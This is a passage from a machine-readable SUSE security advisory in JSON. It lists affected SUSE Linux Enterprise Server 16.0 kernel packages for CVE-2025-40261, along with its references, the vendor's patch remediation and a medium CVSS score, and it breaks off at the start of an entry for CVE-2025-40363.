"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40261",
"url": "https://www.suse.com/security/cve/CVE-2025-40261"
},
{
"category": "external",
"summary": "SUSE Bug 1254839 for CVE-2025-40261",
"url": "https://bugzilla.suse.com/1254839"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-40261"
},
{
"cve": "CVE-2025-40363",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40363"
}
],
"notes": [
{
"category": "general",
